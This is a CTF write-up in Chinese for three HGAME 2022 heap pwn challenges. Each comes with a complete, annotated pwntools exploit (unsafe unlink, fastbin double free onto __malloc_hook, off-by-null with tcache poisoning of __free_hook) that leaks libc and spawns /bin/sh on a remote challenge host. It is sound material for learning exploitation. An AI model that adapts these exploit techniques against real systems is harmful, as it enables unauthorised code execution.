HGAME 2022 Week3 Pwn

三个最简单的堆模板题,真是一周比一周简单了......

changeable_note

unsafe unlink 模板题(目标 libc 为 2.23,通过把伪造 chunk 的 fd/bk 指向 note 表来通过 unlink 的 fd->bk / bk->fd 检查),当然用其他方法也能做。(感谢狒猩橙写的exp)

from pwn import *
from hashlib import *
# Fixed 64-bit target; 'debug' logs every byte sent and received (noisy, but
# it is what makes the heap interaction below traceable).
context.arch = 'amd64'
context.log_level = 'debug'

# Hard-coded remote instance; the commented-out process() line is the local
# alternative the author switched between.
s = remote('chuj.top',52533)
# s = process('./note')
libc = ELF('./libc-2.23.so')   # challenge libc (glibc 2.23); atoi/system offsets come from this file
elf = ELF('./note')            # target binary; PLT/GOT addresses are read from it below

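def getYZM(s64):
	"""Solve the server's proof-of-work.

	Brute-force the 4-character string over [a-zA-Z0-9] whose SHA-256 hex
	digest equals ``s64`` (the 64-byte hex string read from the socket).

	Args:
		s64: the digest as bytes (as returned by ``recvline``); a ``str`` is
			accepted too.

	Returns:
		The matching preimage as bytes, ready to pass to ``sendline``.

	Raises:
		ValueError: if ``s64`` is not 64 characters long, or no preimage is
			found. (The original fell off the end and returned ``None``,
			which only blew up later inside ``sendline``.)
	"""
	from itertools import product

	if len(s64) != 64:
		raise ValueError('expected a 64-char hex digest, got %d chars' % len(s64))
	target = s64.decode() if isinstance(s64, bytes) else s64
	table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	# Same enumeration order as the original four nested loops
	# (62**4 ~ 14.8M candidates in the worst case).
	for cand in product(table, repeat=4):
		st = ''.join(cand).encode()
		if sha256(st).hexdigest() == target:
			return st
	raise ValueError('no 4-char alphanumeric preimage found for ' + target)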

def add(index, size, content):
	"""Menu option 1: create note ``index`` of ``size`` bytes holding ``content``.

	The choice, index and size are each sent as a line at successive ``>> ``
	prompts; ``content`` is sent raw (no newline) at the last prompt.
	"""
	for reply in (b'1', str(index), str(size)):
		s.sendlineafter(b'>> ', reply)
	s.sendafter(b'>> ', content)

def edit(index, content):
	"""Menu option 2: overwrite note ``index`` with ``content``.

	The final write uses ``sendline`` without waiting for a prompt, so a
	trailing newline byte is appended to ``content``.
	"""
	for reply in (b'2', str(index)):
		s.sendlineafter(b'>> ', reply)
	s.sendline(content)

def delete(index):
	"""Menu option 3: free note ``index``."""
	for reply in (b'3', str(index)):
		s.sendlineafter(b'>> ', reply)

# Address of the program's note pointer table (hard-coded, so the binary is
# presumably non-PIE). fd/bk are chosen so that fd->bk and bk->fd both
# resolve to note[0], which is what glibc's unlink check
# (P->fd->bk == P && P->bk->fd == P) requires.
note_addr = 0x4040C0
fd = note_addr - 0x18
bk = note_addr - 0x10

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']   # unused below
free_got = elf.got['free']
atoi_got = elf.got['atoi']

# Proof-of-work: the banner ends in "sha256(xxxx) == <hex>".
sh=s.recvuntil(b") == ")
s64=s.recvline(keepends=False)
s.sendline(getYZM(s64))

# Note 0 (0x40 chunk) sits directly before note 1 (0x100 chunk); note 2 just
# stores "/bin/sh" for later.
add(0 , 0x30 , b'a')
add(1 , 0xf0 , b'a')
add(2 , 0x30 , b'/bin/sh\x00')
add(3 , 0x30 , b'a')

# Fake chunk inside note 0's data: prev_size=0, size=0x31, fd, bk, padding,
# then 16 bytes of overflow into note 1's header: prev_size=0x30 (distance
# back to the fake chunk) and size=0x100 (0x101 with PREV_INUSE cleared).
# edit() uses sendline, so one extra '\n' byte follows the 0x40-byte payload.
payload = p64(0) + p64(0x31) + p64(fd) + p64(bk) + b'a'*0x10 + p64(0x30) + p64(0x100) 
edit(0 , payload)
# Freeing note 1 consolidates backward and unlinks the fake chunk. unlink does
# FD->bk = BK then BK->fd = FD, both of which hit note[0]; the last write wins,
# so note[0] = fd = note_addr - 0x18.
delete(1)

# Writing through note 0 now rewrites the table itself: 0x18 bytes of filler
# cover [note_addr-0x18, note_addr), then note[0]=atoi@got, note[1]=free@got,
# note[2]=atoi@got.
edit(0 , b'a'*0x18 + p64(atoi_got) + p64(free_got) + p64(atoi_got))
# free@got <- puts@plt (4 bytes + NUL, enough for a non-PIE PLT address).
edit(1 , p32(puts_plt) + b'\x00')

# "free(note[0])" is now puts(atoi@got): prints atoi's libc address.
delete(0)

# recv(6) assumes the 6 significant pointer bytes are the very next thing on
# the wire (nothing else printed first).
libc_base = u64(s.recv(6).ljust(8,b'\x00')) - libc.sym['atoi']
success('libc_base=>' + hex(libc_base))
system_addr = libc_base + libc.sym['system']

# note[2] aliases atoi@got: atoi <- system, so the next menu input string is
# handed straight to system().
edit(2 ,p64(system_addr))

s.sendline(b"/bin/sh\x00")
s.interactive()

elder_note

fastbin double free 拿到 __malloc_hook 附近的 chunk 后,把 __malloc_hook 改成 realloc、__realloc_hook 改成 one_gadget,借 realloc 的栈帧调整来满足 one_gadget 的约束。(感谢狒猩橙写的exp)

from pwn import *
from hashlib import *
context.arch = 'amd64'
context.log_level = 'debug'   # logs every byte on the wire; handy for checking the heap steps below

s = remote('chuj.top',52703)   # hard-coded remote instance
libc = ELF('./libc-2.23.so')   # challenge libc (glibc 2.23); the hook/one_gadget offsets below are for this file only
elf = ELF('./note')            # loaded but not referenced further in this script

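def getYZM(s64):
	"""Solve the server's proof-of-work.

	Brute-force the 4-character string over [a-zA-Z0-9] whose SHA-256 hex
	digest equals ``s64`` (the 64-byte hex string read from the socket).

	Args:
		s64: the digest as bytes (as returned by ``recvline``); a ``str`` is
			accepted too.

	Returns:
		The matching preimage as bytes, ready to pass to ``sendline``.

	Raises:
		ValueError: if ``s64`` is not 64 characters long, or no preimage is
			found. (The original fell off the end and returned ``None``,
			which only blew up later inside ``sendline``.)
	"""
	from itertools import product

	if len(s64) != 64:
		raise ValueError('expected a 64-char hex digest, got %d chars' % len(s64))
	target = s64.decode() if isinstance(s64, bytes) else s64
	table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	# Same enumeration order as the original four nested loops
	# (62**4 ~ 14.8M candidates in the worst case).
	for cand in product(table, repeat=4):
		st = ''.join(cand).encode()
		if sha256(st).hexdigest() == target:
			return st
	raise ValueError('no 4-char alphanumeric preimage found for ' + target)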

def add(index, size, content):
	"""Menu option 1: create note ``index`` of ``size`` bytes holding ``content``.

	Choice, index and size go out as lines at successive ``>> `` prompts;
	``content`` is sent raw (no newline) at the last one.
	"""
	for reply in (b'1', str(index), str(size)):
		s.sendlineafter(b'>> ', reply)
	s.sendafter(b'>> ', content)

def show(index):
	"""Menu option 2: make the program print note ``index`` (caller reads it)."""
	for reply in (b'2', str(index)):
		s.sendlineafter(b'>> ', reply)

def delete(index):
	"""Menu option 3: free note ``index``."""
	for reply in (b'3', str(index)):
		s.sendlineafter(b'>> ', reply)

# Proof-of-work: the banner ends in "sha256(xxxx) == <hex>".
sh=s.recvuntil(b") == ")
s64=s.recvline(keepends=False)
s.sendline(getYZM(s64))

# Layout: three 0x70 chunks (fastbin range) and one 0x90 chunk, which is too
# large for a fastbin under 2.23's default limit and so lands in the unsorted
# bin when freed.
add(0 , 0x60 , b'a')
add(1 , 0x60 , b'a')
add(2 , 0x80 , b'a')
add(3 , 0x60 , b'a')

# Leak: the freed chunk's fd points into main_arena, and show() evidently
# prints freed notes (no use-after-free check in the program).
delete(2)
show(2)

# Unsorted-bin head = main_arena+88 and main_arena = __malloc_hook+0x10 on
# this x86-64 glibc 2.23 build. recvuntil(b'\x7f') assumes the leaked pointer
# is the first 0x7f-terminated value printed.
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x10 - 88 - libc.sym['__malloc_hook']
__malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
# one_gadget offsets for this particular libc-2.23.so; index 1 is the one that
# worked for the author (each gadget has its own stack-state constraint, and
# going through realloc is what shapes the stack to satisfy it).
onegadget = [0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base + onegadget[1]
success('libc_base=>' + hex(libc_base))

# Fastbin double free 0 -> 1 -> 0: the intervening free of 1 defeats the
# "freeing the chunk already at the fastbin top" check.
delete(0)
delete(1)
delete(0)

# Chunk 0 is now both the head and the third entry of the 0x70 fastbin, so
# writing its fd links a fake chunk at __malloc_hook-0x23 into the list
# (the usual spot: the byte there is 0x7f, which passes the fastbin size check
# for this bin).
add(0 , 0x60 , p64(__malloc_hook-0x23))
add(1 , 0x60 , b'a')
add(4 , 0x60 , b'a')
# Fourth allocation returns the fake chunk: its user data starts at
# __malloc_hook-0x13, so 0xb bytes of padding put one_gadget at __realloc_hook
# (__malloc_hook-8) and realloc at __malloc_hook.
add(5 , 0x60 , b'a'*0xb + p64(one_gadget) + p64(realloc))

# Trigger: the next malloc goes __malloc_hook -> realloc -> __realloc_hook ->
# one_gadget. Sent by hand rather than via add(), presumably because the shell
# spawns inside malloc before the content prompt; "8"/"32" are arbitrary.
s.sendlineafter(b'>> ' , b'1')
s.sendlineafter(b'>> ' , str(8))
s.sendlineafter(b'>> ' , str(32))
s.interactive()

sized_note

off by null 模板水题(用 off-by-null 清掉下一个 chunk 的 PREV_INUSE 并伪造 prev_size 制造 chunk overlap,再借 tcache 把 __free_hook 改成 system),随便写写就行了。

import itertools
import string
from hashlib import sha256

from pwn import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')  # debug: every byte on the wire is logged

#io = process("./note")
io = remote("chuj.top", 52838)   # hard-coded remote instance; the process() line above is the local alternative
#libc = ELF("./libc-2.27.so")
libc = ELF("./libc.so.6")        # challenge libc; __malloc_hook/__free_hook/system offsets come from this file

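# Proof-of-work gate: the server prints sha256(prefix) for a 4-character
# prefix drawn from [0-9a-zA-Z]. Enumerate in the same order as the original
# four nested loops (62**4 ~ 14.8M candidates worst case); itertools.product
# replaces the loop nest and the `f` break flag.
table = string.digits + string.ascii_letters
io.recvuntil(" == ")
tar = io.recv(64).decode()
success("tar:\t" + tar)
prefix = ""
for candidate in itertools.product(table, repeat=4):
    guess = "".join(candidate)
    if sha256(guess.encode()).hexdigest() == tar:
        prefix = guess
        break
else:
    # The original silently sent an empty prefix here; fail loudly instead.
    raise RuntimeError("PoW: no 4-char alphanumeric preimage for " + tar)
success("prefix:\t" + prefix)
io.sendlineafter("> ", prefix.encode())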

def add(index, size, content):
	"""Menu option 1: create note ``index`` of ``size`` bytes holding ``content``.

	Choice, index and size go out as lines at successive ``>> `` prompts;
	``content`` is sent raw (no newline) at the last one.
	"""
	for reply in (b'1', str(index), str(size)):
		io.sendlineafter(">> ", reply)
	io.sendafter(">> ", content)

def show(index):
	"""Menu option 2: make the program print note ``index`` (caller reads it)."""
	for reply in (b'2', str(index)):
		io.sendlineafter(">> ", reply)

def delete(index):
	"""Menu option 3: free note ``index``."""
	for reply in (b'3', str(index)):
		io.sendlineafter(">> ", reply)

def edit(index, content):
	"""Menu option 4: rewrite note ``index`` with ``content``.

	``content`` is sent with ``send`` (no trailing newline) so the program
	sees exactly len(content) bytes -- this is what makes the off-by-null
	write below land on the intended byte.
	"""
	for reply in (b'4', str(index)):
		io.sendlineafter(">> ", reply)
	io.send(content)

def quit():
	"""Menu option 5: exit the program. Defined for completeness; not called
	below. (Shadows the builtin ``quit``, harmless in a script.)"""
	choice = b'5'
	io.sendlineafter(">> ", choice)

if __name__ == '__main__':
	# Heap layout (chunk size = request rounded up + header):
	#   notes 0-7: 0x100 each, 8-9: 0x60, 10: 0x30, 11: 0x100, 12: 0x30.
	# Note 12 presumably keeps note 11 off the top chunk so that freeing 11
	# consolidates backward instead of into top.
	for i in range(8):
		add(i, 0xf0, b'\n')
	add(8, 0x50, b'\n')
	add(9, 0x50, b'\n')
	add(10, 0x28, b'\n')
	add(11, 0xf0, b'\n')
	add(12, 0x20, b'\n')
	# Seven frees fill the 0x100 tcache bin; the next free of that size goes
	# to the unsorted bin instead.
	for i in range(7):
		delete(i)
	# Off-by-null: 0x28 bytes fill note 10 exactly, so the program's
	# terminating NUL lands on note 11's size byte (0x101 -> 0x100, PREV_INUSE
	# cleared) and the last 8 bytes become note 11's prev_size = 0x1f0, the
	# distance back to chunk 7 (0x100 + 0x60 + 0x60 + 0x30).
	edit(10, b'a'*0x20 + p64(0x1f0))
	# Chunk 7 -> unsorted bin; freeing 11 then consolidates backward with it,
	# leaving one free chunk that overlaps the still-live notes 8, 9 and 10.
	delete(7)
	delete(11)
	# Carve the merged chunk so the remainder's header coincides with chunk 9:
	# 0x110 + 0x50 = 0x160 = sizes of chunks 7 and 8 together.
	add(11, 0x100, b'\n')
	add(12, 0x40, b'\n')
	# Note 9's data now holds the remainder's fd/bk (unsorted-bin head).
	show(9)
	# main_arena+96 is the unsorted-bin head and main_arena = __malloc_hook+0x10
	# on this x86-64 build (libc 2.27 going by the commented-out line above);
	# recv(6) assumes the pointer is the first thing printed.
	libc.address = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
	success("libc_base:\t" + hex(libc.address))
	# Note 13 is served from that remainder, i.e. the same memory as note 9.
	add(13, 0x50, b'\n')
	# Free note 9 into the 0x60 tcache bin, then use the alias (13) to replace
	# its tcache next pointer with __free_hook - 8.
	delete(9)
	edit(13, p64(libc.sym['__free_hook'] - 8))
	# First allocation returns chunk 9 again; the second returns __free_hook-8.
	add(14, 0x50, b'\n')
	# "/bin/sh\0" sits at __free_hook-8 (start of note 15's data) and system
	# at __free_hook, so freeing note 15 runs system("/bin/sh").
	add(15, 0x50, b'/bin/sh\x00' + p64(libc.sym['system']))
	delete(15)
	io.interactive()